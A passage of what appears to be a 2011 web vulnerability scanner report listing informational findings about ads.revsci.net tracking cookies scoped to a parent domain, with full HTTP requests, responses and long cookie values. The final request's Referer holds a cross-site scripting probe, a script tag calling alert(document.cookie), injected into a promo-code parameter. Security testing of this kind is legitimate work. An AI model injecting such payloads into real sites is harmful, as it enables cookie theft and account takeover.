NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_Kz1B="MLsXr98vcS5joAD3bWnZbLvnP/+KE1cvxxz+0wdb2PxBN+R0RSFIK3cKZ3+o5AVFSd5d5ssFdZ2XdS1J6ERW+BtM90GwO1Jf3J+svMJ4/csB8HP99h1rKGCqCGIh2xYI3Fvzvh3NuiMBnovWFDuF1xjfsYP1R8qsG42VULSa+sr/35iz34m/11lMDXN1AX9njioLN2ChPaIXlfxBectuiUVgU0P45W3JtxbyyxtPjFDFvSB3z65Y465ibv+/5utsqAHA6C7nBh6djpodR2d3ogV4aXJvd1v+vu8G0OhpMAsq67dES6DnMmod26xlYmpIm7oLLHQreFyS+X9JpEnNjiLVeG1pqatl8HZNbwSbBG8PdUu8OmYBIq2J4KA3tC3AUVE/bcNrvKaXikFYzLm/nYzn3T771H+QePf7"; rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hid7vWrRtcbg/87S4gsVar0CeCLBpcKI72Wvze9j97z84TKAm0Rt9ZtbR0ijMugza0Qe5pDtWTr6P4O2VTn9OWf69842Hfphbg/yHhecjeZxoBUgnlB/F2HdUOiY/FnNpAR6Yb4p11NSMhG/KP2u7EP6r3IydGDFeOiju1DJKUDpjfkg6EczNi2MImmflQIF1cOVVjLfTIctA84K1Duqop5MuAE9pP2A+QQfoGhYngbnTf97wilg35GyS3/8ryDOEJH5EumfAisx5oE+dY3kzYargOAvr0G9H+GYdgpAvQb5TKPGOgN6EiCaPSm5rnJxzMqA6rO3mpCX77qa2Ho0jD3aEltyb9bJMqJ9PwqUsVpjeSYp4WGNO3JRdKJxgfniKDmNefa2d1BW2Wh8kghoYpxfExL2Wjyu5Ewt0XZcuSo4HFo+cf7EfuqX3CStW3aNIaM2ycgH5HD7+aiYvP6CLDcIR9llQyuAnOJlOgf1SYPoNDEZiaROfoFMHCCACbTyTwsIZo7gKIyJzj6oBezmQIyuVdfB0qAsJlBrbXvSia2r0+p3f1uNsfNkdzUeqiXwrKqeL0cfZ/vrFCCr/HEZmnQwfSO4bhpS1mYMFRTXljVGrQBXZP23w1g4SB2g2r6MHc5Pzt36KPxeMWOL5418bzHZdWwqa13n89Ok/6a1QUG2VDo9UTTOb+JLnM2sYKk7sbkOFh4SBVM8phfg7sZLufZucWACOs/NLHHFV5agvJZmE1D0bSq1HSY5y44BZhNz2hBTwyEyITUaX2uP/Q1XHnliwNTiMU60QUP3w+Y3RPX0z5E/HIUe5Kt7Agvbwl+yWOum+d0YXNX2zxnx903R08ea5ceS5PWRH/1MT2luVJbro74r6EmLVmoshJLasg7fnzqszJ2WV9c+bKMnT+z8ZN1FhKx/K0FWoUf1EEuWbvAz4cqAfgEtHfT8+fo6aj/rPHGUjNsNae6l1VttJItBc2XnDjizNH7anCs3JH29ZpHJCcZvoOS6ifQ3AsA="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Kz1B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Kz1B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_o_YB="MLsXr98vcS5joAD3RWnZbLtzZAzP6/3QvbFY8brNjhfQZzRy/3X9YSyGbFxsN8G0yqulX+Pn6fT77EwpfyXgQdDoD8ExG9XdosQTSO5JaI/ifm4pCaBWAGUXgyxMnMeayp9qM4Dfxcgivu6oRZYK4tLsyUCNHsJzA0ue4bYZm3Yr1Ii/8Frh4YCDSU2AKRAYmYO4mhxXzjFVizEkhHghBeBMejkXDWkFVpZFdJBb+7HqzCzTk1UQDlT2PROx4nyyaEMjdDmLFND1M5pXG++vMJzhD7J7mRXm6jp5YWVv1nqFctXyeSI7ZLD/HSjFMKINO4FJgacx3JvckX6F4tmU1Fj0WAtVBJbk2nr4A7CJzwfNMNhtSyL1bGn7HiJkIFLdmtlcSukRVDvh+KeI1SEyoci/ul5Ntl5t9EXwew=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hif7oMCGHppJ8S4dCaezGRJhlUWVyRvUosdoZNavV8q90zKD5s/ez6yLk/3MyALEhJth7PRDWcqYy1fztHQnZ+eGOprDErg4uKj3Y26WxWclP5Xwum07f9vg4fQdGgwgCWnLAVuwjXo9LLfaqw046Iln7+E+3F6qjUNIRuOkdO9MYwCv4CDy0/3Kb9+Wl3aCZv0ItNg1+yO6kh/JTRJxDejvBYxAgmw7i43J3ecXGUlCWv2i5Nf79A1wYSKmlJCIaymo3gG4KwA1yTTI6t4Nkc6tqs2NbI61n+o6xA+Y77YQlrYTI9JJbPgZKRz3+ulGoPGhSkQQ1GbdMwH+y/dWWUtyw24DCRz/AcqY3cG4oo0NIK9CLwBfQh26itpdy4mf8bOovwDj0eaa6g62V2hfDTysp7moX5MYjmHlhgj7JvXOxjXVuyAp1V0RKl12NJ3nGHMI65/MZUj90SXBV8RL5ZenSRMka2G3IaKIvKih5uQb+QJ7LqGL9pZiO2AudY9hX/aRFtAiCBuqTjfnnm2gMnEMf/52b9pFxHk+8EG6iwrqbv53bcHGIhlkcdyNR4SeoSXfFd48PzZdq4AIxW2yjYKjriwPAI6vnDIea4CL7QinSWNGEIkSqIXYtFNiYIVFvIJtS2MFxcfzJXdcAfn8ozwv03Bi0JzmeaCHEoIqyMSEqoJaI/JqaqOGOWdjmlZUYLQIBnDO+TGFxtx+FBjVY1sWLMrNv6c4B44LpPENQqOMcBXWyly86T6H2zx246HUzjUmwZ6jui1LBt9nRTW59ygZ/XX//bkI2DnA0okFtLxeR/J9gYwfiH+KRqguE7UJbbiSjrWiKo7Ox59VdZcbmC0ER00K5/r3XvdcFwpkzWDRZKpU65hkqtFIcZe5WmY38LsdMH268wBBiQqcAohZQHUG15pBgz3LB7kMWAUnSKHiE2X2pagnZmTVmWVP476LC8KGVdX2Eph7k1eYUQjRVJqr0q2tVIyN6OWkrSGPJKRsP1AZL3rEdIZfeg=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:08:55 GMT


17.27. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/how-it-works/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_2Ia5="MLsXr98vcS5joAD3TrInbrsHB6iUxxv6U9Ewo82dvq95LzyKcUd+SGxI5LXUVUbqNw0KcSykIgDMCLZ+LUekPkU3ZzHAnufPANfumkONPJ1vRRh59tenoHHjrRb5k67Sm6BnvhZOe1mCSUSYzT/0fgOACtqy5iXVomtxAZzacvIs1os8ctiYILCzcUGEKwAUbYDZ+gRfyTNVizEkjHghBeBOehkXDWkFVpZNcmrau472yi7Tk1UQDlT2PRGx4ny6aEMndDmCQRPdzJomsgEPKOZANGnQYsYrLEvr+wJqPo2Md9XyeSIz5rA/HijFNKINO3FJhacxFZoYVdm5OhizDcF2J4MFaMQYQ5VLkgCwK5k1whxQ3zMkV3gw6CsqcayotvrS10X59UwbUP/ABx6/FxtZ9qF5+9xsG5L3dw=="; rsi_us_1000000="pUMdJD9HMAYU1E2EPnsIIDz/BtZLv2rR/V4c7O6C3v7m/kxmFYk/sE+g72Wvze9j97z84DKAm0Rt9ZtbR0ijMugza0Qe5pDtWTr6P4O2VTn9svj69842Hfo95KEGQpbMeW+0NaNhmBYTXTkRQKS1XMUccblUZCb8d1ioTrWzOZ45+knAG4/fSC2XVCuSI3SfynIhw/0lJepQCzIltDUGLYzLUkLv/MFxI8xXEt5FPdByafvFHnwcc+g50hOTbL+g7n64N54Np8vbYE35aYyaJiGjpBaC12VhkZlzFtMxirRDAwPWID4NdT8+H1n+vIDBsAcC4v6vpxRHAQWP/wFECr4Zl33i7snI0unkbnfWDKcc2lBdCDsvleyPGu7IGOFhOgsC4wPBBfAj1GcROo+BilbXokC4Pz9vadLAfzLPlIdm0h4ILB9XSlyVc4b6FJRKQ8GSIuCUsCUIuhiY7qOe4dxMbmgcF8Z5vsbPVtNU5unXYkl1MhFPAXo6dObcC7t2Mp4lHB3smqaDjmSWTHYhcyvCsdckm7oUK5b0m3OWakUES9n6/gVIYIYYx4Q8OEV/NJVzUMJ3P0YTcfNkdzUeqj3w7I6vhwmxCxO1HK1RTc4UB35R4M3XJY0QrizGyoGlm9y6oPqyNcDNzYKTvC6oJGklEo2V4PXXhd5rDMHIhx2MXWu4IK+b30e7OfPWDWKlQbvGkOch0VHJWX9SvL5QvXWojkDL40JInzmAVr4XQyDFi7ty6xaQdTP7HzqDar+jK2lgMToKlZIkWUobdESNbO5VUYuF6zbZ/f7YfwXtEOZYHnlawNXis8+0xTL3web3W3GLT/ZTAh4qtrkjAQnd3V8EdMPIYePwpRv8DD3B2L4a6XH5lygIq/vjuHhcNjMMUQ+X+fLAOHHNWjDM+52IKUhADIXMSqGCsUEAyiBu5V+I6rJBxrv9bh4sTdGrxy8QWKFJQU2vB09tMV34No6/mhl+STAB+L7fmkFhELkBHvTZutKd7KYQ1aPWbdRmJfIrHLhmsKllabrGbl63"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2Ia5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2Ia5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NlSe="MLsXr08uMT5n4BD3bLua7kUHKxycqFuHHYWrQ4CcmI8DWfWhTlgNS3bAhAe5Ek6MTKFNTT5xYaf4SRDbPGD9pzbuj7m3W9LehF9HBn8KpH5maLzmo/IEYGm7ZsUglwRaDpS5XjA7brvD0QxRDVCLNbezOsf0yoqeO4c9EfAZWEqBka72ko6UicWuG1yTBBss9ckcEDqRZwS4RMHgTDyNbZtXdwEX5eFl3+RCbqZ+L5dJtYUpZZz6Q6z8dXjprrK/cKVEi+YyPq9Z14+HRRl2OLIVdWQbBiBD/7TuEYKhZnZfNuGiEAKk+jB3BMi6NjJ/X4+zFjN4JIVambd/JpUPzroQ0nl7LNG8eII/VzxFlhp4C3BW5XBxBS+tnLnyILAgwEQIeWrRbOj1i8mDDDnMo6DH5j2110rT0dL2EQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3soHtea7ubdYdxLy/lJT87u7OZ5hB4giwRLN67eJ02IAcpR9TattCy1Zb/ZGpqmMoG8gcE7LQ6jRkwYJBMpzLVaLXE2wLlSuQot46gmeeqQPhHlUjaPpsrgyHurE0UGdaGp3HtPfYQ0zoxLNvYWePVBi2GG3GdLN6NcUgYQs1Lspv8+3ieiZR3aN0Q5peAGU44tgNRwckUHjN35lSoNd85yzoKZUuAE9pP2A+YQfoGhYngbrTf8bwilg368Sy3x8qoPLnh3X53wX8I/IETXdm5bpdAoE2hTTZ6K1H0VU/gQAwoaXw+iPHX2eAIdHHdoaYpmT+ERLJsiANnM9Z5EFziSdC96w48tMQoukW4Ksl1ZOopa7GC8HPFVaD6t3U32r9sbTyZkKK8QA8JbzsDvfwIxbEP2PUVHeXmSSxv1yl+5zD2aqQXy3rE21OIbQG0Txff9Q6+QE4SRR2rr8yhSPM0aOTW2BlGO9zv4pDblC5CNIG8rXO1JkD/C3oThuUHWYhoeO8DtDWYMdqMr2m9VrGEceghR5JD3D8RHf7LpHhsuJx3jJotF3dxCG7MV8zDAMz2B/rQJKMvNjijXT0lUoyMHEc7PYlC/UHPRjdNEbjfsyU3vHiIPcXm2URkNHzlWjj0emnFiAyQHyCPxWKWPn7u21hzyVmNjG99yAYWX+wAazYRfFR/c8+aIvtHtKLiK9T5jCISpw2ZmX4RnayGawcJnnPsCNUloDfJ0JTMwujfD6FlxPPXvlu380sfvmSiRjZvQCuIB370j6Ksga3WpNkZQkX3KGJU3hM+yZb5MzFP5k5bsnJ55jGqCtm0c6Mi0rqxK9yOEGjkcPV/zGQXuqqJMtWozTmjQ2ukOQWf0aZ2mu2NrC05+ZgOoOQt2UIjUKH5vWWG5ekz2hDMNgjVap5KFmOT3Cz5jpI4zA90AVCQTPC3swcaxfRCaPlIafa8pX4vh5WMEVqajOSPgq3gvJ1//x8UgIOQfpJr5p0lQkqGP3RDrUzvdEy1l0+YhekA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:17:25 GMT


17.28. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/offers/faces/female/?promocodehide=ADCONIONRT&c3metrics=adcon
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_o_YB="MLsXr98vcS5joAD3RWnZbLtzZAzP6/3QvbFY8brNjhfQZzRy/3X9YSyGbFxsN8G0yqulX+Pn6fT77EwpfyXgQdDoD8ExG9XdosQTSO5JaI/ifm4pCaBWAGUXgyxMnMeayp9qM4Dfxcgivu6oRZYK4tLsyUCNHsJzA0ue4bYZm3Yr1Ii/8Frh4YCDSU2AKRAYmYO4mhxXzjFVizEkhHghBeBMejkXDWkFVpZFdJBb+7HqzCzTk1UQDlT2PROx4nyyaEMjdDmLFND1M5pXG++vMJzhD7J7mRXm6jp5YWVv1nqFctXyeSI7ZLD/HSjFMKINO4FJgacx3JvckX6F4tmU1Fj0WAtVBJbk2nr4A7CJzwfNMNhtSyL1bGn7HiJkIFLdmtlcSukRVDvh+KeI1SEyoci/ul5Ntl5t9EXwew=="; rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hif7oMCGHppJ8S4dCaezGRJhlUWVyRvUosdoZNavV8q90zKD5s/ez6yLk/3MyALEhJth7PRDWcqYy1fztHQnZ+eGOprDErg4uKj3Y26WxWclP5Xwum07f9vg4fQdGgwgCWnLAVuwjXo9LLfaqw046Iln7+E+3F6qjUNIRuOkdO9MYwCv4CDy0/3Kb9+Wl3aCZv0ItNg1+yO6kh/JTRJxDejvBYxAgmw7i43J3ecXGUlCWv2i5Nf79A1wYSKmlJCIaymo3gG4KwA1yTTI6t4Nkc6tqs2NbI61n+o6xA+Y77YQlrYTI9JJbPgZKRz3+ulGoPGhSkQQ1GbdMwH+y/dWWUtyw24DCRz/AcqY3cG4oo0NIK9CLwBfQh26itpdy4mf8bOovwDj0eaa6g62V2hfDTysp7moX5MYjmHlhgj7JvXOxjXVuyAp1V0RKl12NJ3nGHMI65/MZUj90SXBV8RL5ZenSRMka2G3IaKIvKih5uQb+QJ7LqGL9pZiO2AudY9hX/aRFtAiCBuqTjfnnm2gMnEMf/52b9pFxHk+8EG6iwrqbv53bcHGIhlkcdyNR4SeoSXfFd48PzZdq4AIxW2yjYKjriwPAI6vnDIea4CL7QinSWNGEIkSqIXYtFNiYIVFvIJtS2MFxcfzJXdcAfn8ozwv03Bi0JzmeaCHEoIqyMSEqoJaI/JqaqOGOWdjmlZUYLQIBnDO+TGFxtx+FBjVY1sWLMrNv6c4B44LpPENQqOMcBXWyly86T6H2zx246HUzjUmwZ6jui1LBt9nRTW59ygZ/XX//bkI2DnA0okFtLxeR/J9gYwfiH+KRqguE7UJbbiSjrWiKo7Ox59VdZcbmC0ER00K5/r3XvdcFwpkzWDRZKpU65hkqtFIcZe5WmY38LsdMH268wBBiQqcAohZQHUG15pBgz3LB7kMWAUnSKHiE2X2pagnZmTVmWVP476LC8KGVdX2Eph7k1eYUQjRVJqr0q2tVIyN6OWkrSGPJKRsP1AZL3rEdIZfeg=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_o_YB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_o_YB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hX-W="MLsXr98vcS5joAD35amm7m19U6iUxxv6U9Ewo82dvq95LzyKcUd+SGxIJH6o5AWlJkXeWWHv5qH4v/rM6OkMWqsFTvNPsXNekBTra/wwM4K2sibLTV2AOHFxkiVE9wV4/aofu4mf+YzCLyKAhfLTTeqCuZtujWf0mVUBm5iueociN9nMcHEBiWq4o9fatvXmE6yZ/0kCX73FbCLj/eLX67dLITBGr6Vts2oYC1XMLcjvcbHvF+Gfp+KabcKl3A3N5GRsbVvBxAgcV8qGf0I5oRF4rmVtRQWqfG3YSgbjakDBikQcLdr73FrrV7LpTFHBo/ShP4v0zweUXVvR2lDfsTUqd9mF4ch3/QIDNuIgzv2zwCKIcl4kIFp4Jb57PXWhqKOjlNBT/qEfJ76Dv808tBtcl+x2CIuaYlEz7rw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJD9HMAYYlW23lB1alXr9BmaqyZcgtsTgox7CLyoprYp1/zjRrRdkE/0saMayW1zRBctP4S6OvfJlCxVYlEdNlLrjQdALUzrVeczrQefVoO0/q0m9kAg9P/oCOMPJZss+pplsORhgl+llLQbNRgD3q9KOBpcmtNX6lYn3MRrKbEUKls9oRIVpNN41zokjpyeOpu6gqvo3XQQqZfYIqU8FuMO8gdpZQmblt2FJeOTh6LlOa3JmcSpGXnfR8D4pf6MREwpe7hIarrRyyzz0habHjklxZ1XVlR/DG0weNS1YxMm9x2oZ1UNBLdkNX4PT6FCycjrd4zNqglqfpk2TgWNd5lDN+8DIW7lXVbaoVt8s6ors/eWQUMRuWz38y1G9mKxjOS4aVRVDXNumTvi1vA9vPCy+OL/abeliEDrdwk/bH2H+VfnDCt5qM6IM35w5jjvb0CtQAF49dJD1B78SKhj8NZFUEceldIHW1o43LFMREEtdGdU90PBoMciEgFpt73X0YO9owc/Gf6Ybh0e9KOQIpROavaaHG1xRkxBMRWK82gXGVoiDNSWEXfh2feZwTlqYAO1NP8EFG/8o6nYPShAtISuCD/sLRpU7ynslfUlvcrwLUhc29zCm+FmNDC4/CHKZvIaauG6jQi6P4eQxPIlrbxV8nrdmkimQWspCOlUuRke9tNnBKWg7YKJAG49/WwOyeuOy11+t7EhGsHDmiid4U8l8NHpyhFONeseVrYlzb6X6QnmdO1P3SsAbInuT8dis2BAk1DVSkb7DKlu9G+vY+nyAkjRmbZkDHtTawKZh/5ALg+hCpgBDeS/89vWYqZ5GmmYwQI8hT9D38W2XNZKe9mPQODMvs8Kkrz08wXBsKtINlzl0rWjyHHVAKU3MmBA9uXkHr0oaOZeR6Dx2oA5IkP04PsI2ZIwqMoK7cq7R8O/OSyl5f9H5hCIC7WsLNH3zNIiKaJPtKT2PmGwK98+pqZUlAvV+qM/rOlA9gJjRwmfK0Q+ErGz+L2RINP2PSq3jFAEfi48HBFpLE1To"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 12:34:33 GMT


17.29. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/offers/faces/female/?promocodehide=ADCONIONRT7e556%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7f71559fd29&c3metrics=adcon
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
